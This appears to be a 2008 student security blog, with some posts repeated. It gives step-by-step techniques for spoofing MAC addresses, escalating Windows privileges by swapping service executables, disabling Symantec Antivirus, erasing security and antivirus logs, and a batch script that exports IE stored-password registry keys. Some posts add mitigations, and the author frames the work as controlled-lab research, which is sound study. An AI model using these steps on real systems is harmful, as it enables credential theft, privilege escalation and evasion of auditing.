MAC filtering on a wireless access point is easily bypassed. Many organizations use MAC filtering as a means of keeping non-paying customers off of their wireless network. I have seen 2 basic implementations of this :
1. Device can't read or pass any traffic across the network unless its MAC is in the list.
2. Device can read but can't pass traffic(except ARP/DHCP) across the network unless its MAC is in the list.
Both 1 and 2 can be bypassed by using Kismet and listing the connected devices. The attacker then spoofs his MAC to look like an authenticated device. 2 can also be bypassed by connecting to the access point and using Wireshark to see which devices are sending TCP traffic. Once again the attacker spoofs his MAC address to look like a device that is sending TCP traffic.
Monday, February 25, 2008
Wireless Cracking Help
It can be really painful to try and get the right card, driver, and wireless tools working together. I have found that the Backtrack security suite makes this a little easer. They have added most of the drivers you need to their distro. Backtrack even detects and configures your card for you on bootup. I have tried Backtrack with many different pcmcia wireless cards and almost all of them have worked. I picked up a Orinoco gold card off of ebay for $30. This card is obviously a knock off but it was cheap and it uses the same firmware . It also has an external antenna adapter that I can attach to my cantenna. The card has actually worked pretty well for me. But the backtrack suite is my tool of choice for cracking wireless networks. It does a great job of bringing the drivers and the tools together.
War Drive in Provo
Since the Home Depot and TJ Max incidents there has been a lot of talk about wireless security at retail stores. It was insecure wireless networks at these two stores that allowed hackers to gain access to the "secure" internal corporate network. I was curious about this and decided to see for myself, except I decided to look at private home networks instead. I used my Orinoko gold card and Net stumbler to conduct my experiment. I drove through some of the residential areas of Provo, Utah counting the number of secure vs. insecure access points. I did the same in Idaho falls, Idaho. I was amazed to find that in Provo 46% of the access points had no security enabled and in Idaho falls 51% of the access points had no security enabled. The statistics may vary, but I think they are quite telling. Something really needs to be done to help protect the general public. (Note: I did not attempt to access any of the networks in this test. That would be unethical and potentially illegal.)
Wednesday, February 20, 2008
Elevate any account to administrator
This is kind of a cheap shot because you can do almost anything by booting to another os. But it is possible to elevate your account to an administrative account simply by booting to another os like knoppix and using a number of strategies. One method of doing this is:
1. Create an exe that executes a command like "net user localgroup administrators /add"
2. Boot into knoppix from a cd or flash drive and mount the windows system drive as writable.
3.Replace an exe on the system that will be run under the system account with your exe.
4. Boot into windows and login. As soon as the service is run it will elevate your account.
This is one of many attacks that can be executed this way.
Attack mitigation:
Create a bios or if possible harddisk password and disallow cd/usb boot.
1. Create an exe that executes a command like "net user localgroup administrators /add
2. Boot into knoppix from a cd or flash drive and mount the windows system drive as writable.
3.Replace an exe on the system that will be run under the system account with your exe.
4. Boot into windows and login. As soon as the service is run it will elevate your account.
This is one of many attacks that can be executed this way.
Attack mitigation:
Create a bios or if possible harddisk password and disallow cd/usb boot.
From Admin to System user
This can be done with one command. As administrator open a command prompt. Type "at
Disable Symantec Antivirus
It is nearly impossible to stop Symantec Antivirus. Even after all Symantec services are stopped it still continues to scan. This is because it continues to run from a rooted directory located at program files\symantec antivirus\OEM. But it is possible to disable Symantec.
1. Stop symantec avtivirus service
2. Stop defwatch service
3. rename the \program files\common files\symantec shared\virusdefs directory
Symantec will continue scan but it won't be able to find its virus definitions. Symantec will correct its self at the next Liveupdate, so this is not a longterm hack. This will also cause Symantec to log systems errors and tamper errors.
1. Stop symantec avtivirus service
2. Stop defwatch service
3. rename the \program files\common files\symantec shared\virusdefs directory
Symantec will continue scan but it won't be able to find its virus definitions. Symantec will correct its self at the next Liveupdate, so this is not a longterm hack. This will also cause Symantec to log systems errors and tamper errors.
Tuesday, February 19, 2008
How to elevate Windows Power user to Administrator
This one has been a real eye opening project for me. In order to minimize administrative burden many organizations use the power user group. The power user does have limited privileges, but this only gives a false sense of security. It is extremely easy for a power user to elevate themselves to an administrative user. It is this easy:
1. Find a service that runs as the system user and can be written to by the power user group.(ex. many symantec services)
2. program an exe that adds your user to the administrator group.
3. stop the service
4. replace the service exe with your exe.
5. restart the service
6. run net localgroup administrators. Look you are now an administrator.
7. relogin
Attack mitigation:
Dont use power user
Remove power user write privs to all services that run under an elevated user account.(imposible)
1. Find a service that runs as the system user and can be written to by the power user group.(ex. many symantec services)
2. program an exe that adds your user to the administrator group.
3. stop the service
4. replace the service exe with your exe.
5. restart the service
6. run net localgroup administrators. Look you are now an administrator.
7. relogin
Attack mitigation:
Dont use power user
Remove power user write privs to all services that run under an elevated user account.(imposible)
Friday, February 15, 2008
Erase windows security log
The security log can't be deleted while the event logger service id running. Set the "Event Log" service to disable and restart the machine. Then delete the file "\windows\system32\config\SecEvent.evt". The values in this file can also be changed with a hex editor. Reset the event log service to automatic and it will restart the next time the machine restarts.
Thursday, February 14, 2008
Exporting IE password files to another computer
There is nothing stopping an attacker from exporting IE password files to another machine. This would be useful if a program like Symantec were stopping you from using other tools on the local machine. All an attacker needs is a jump drive or other portable storage device. A script can be created that saves the encrypted registry values to their flash drive. Then they can take import the passwords onto their own machine and use tools to decrypt the passwords. This is a copy of my script:
@ echo off
REM search for storage2 in ie7
mkdir ie_info
mkdir ie_info\%computername%
regedit /E ie_info\%computername%\ie7.reg "HKEY_USERS" > NUL
regedit /E ie_info\%computername%\ie6.reg "HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider\" > NUl
The IE 7 passwords are stored in the following path:
HKEY_USERS\\Software\Microsoft\Internet Explorer\IntelliForms\Storage2
@ echo off
REM search for storage2 in ie7
mkdir ie_info
mkdir ie_info\%computername%
regedit /E ie_info\%computername%\ie7.reg "HKEY_USERS" > NUL
regedit /E ie_info\%computername%\ie6.reg "HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider\
The IE 7 passwords are stored in the following path:
HKEY_USERS\
How to delete Symantec Antivirus Logs
Because there are no locks on Symantec logs, they can be easily deleted. The logs are stored in two different places in WinXp: \Documents and Settings\\Local Settings\Application Data\Symantec\Symantec AntiVirus Corporate Edition\\Logs and \Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\\Logs. This may not seem very important but it can be used by an attacker to cover up failed attempts to use hack tools on a machine.
Solution
Deny write and delete access to non-system/administrative users.
Solution
Deny write and delete access to non-system/administrative users.
Tuesday, February 5, 2008
How to recover saved firefox passwords
There are many different software packages on the market designed to recover saved Firefox passwords. In this article I will explain how to view saved Firefox passwords without any special software. We will let Firefox do all the work for us.
Method 1:
If you have access to the windows account where the passwords are saved then the solution can be simple. Open Firefox and go to tools>options>security>show passwords. This will list all of the accounts with saved passwords. If you click the show passwords button it will display all of the correlating passwords.
Method 2:
This method is a little more advanced, but can be used to recover the passwords of any account on the machine. The passwords are saved in the directory \Documents and Settings\\Application Data\Mozilla\Firefox\Profiles\. The files that store the passwords are signons2.txt and keys3.db. If these files are taken and put in the above path of another machine the can be viewed using method 1. The password is recovered and no fancy software was needed.
Attack Mitigation:
Use a master password in your Firefox browser. Go to Firefox>tools>options>security and check the use master password box. This will cause Firefox to ask for a master password before displaying the saved passwords. There are some software packages capable of recovering the passwords even with the master password set, but this will stop casual hackers.
Method 1:
If you have access to the windows account where the passwords are saved then the solution can be simple. Open Firefox and go to tools>options>security>show passwords. This will list all of the accounts with saved passwords. If you click the show passwords button it will display all of the correlating passwords.
Method 2:
This method is a little more advanced, but can be used to recover the passwords of any account on the machine. The passwords are saved in the directory \Documents and Settings\
Attack Mitigation:
Use a master password in your Firefox browser. Go to Firefox>tools>options>security and check the use master password box. This will cause Firefox to ask for a master password before displaying the saved passwords. There are some software packages capable of recovering the passwords even with the master password set, but this will stop casual hackers.
About me and My blog
My Name is Craig Marshall. I am a student at BYU in the Information Systems department. I am interested in computer security and digital forensics. Upon graduation I will be working as a penetration tester for Ernst and Young's Advances Secrity Center. This is a running log of my research and findings. (Note: All of my research is done in my own controlled test environment. I do not attack other peoples machines!)
Subscribe to:
Posts (Atom)